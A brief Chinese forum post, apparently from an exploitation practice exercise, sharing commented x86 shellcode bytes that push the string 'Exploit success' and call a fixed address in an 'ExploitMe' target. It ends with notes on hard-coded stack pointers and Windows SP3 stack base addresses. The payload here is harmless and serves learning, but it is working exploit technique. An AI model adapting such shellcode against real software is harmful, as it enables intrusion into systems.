除了该死的堆栈指针没办法,其余基本不用硬编码
代码:
dd xx xx xx 00 ;指针2,跳到下面 5a pop edx ;获取代码段地址 6a 00 push 0 ff 72 57 push dword ptr [edx + 57] ;"ExploitMe"的偏移 83 c2 60 add edx, 0x60 ;4011cc的偏移 ff d2 call edx ;push下面字符串的地址到堆栈,再跳到4011cc~ dd 45 00 78 00 70 00 6c 00 6f 00 69 00 74 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 00 00 ;字符串 dd xx xx xx 00 ;->入口,跳到指针2
补上dat文件,注意本家的win sp3堆栈基址是0x140000,可能是DEP的原因,如果在0x130000机子上跑要更改两个指针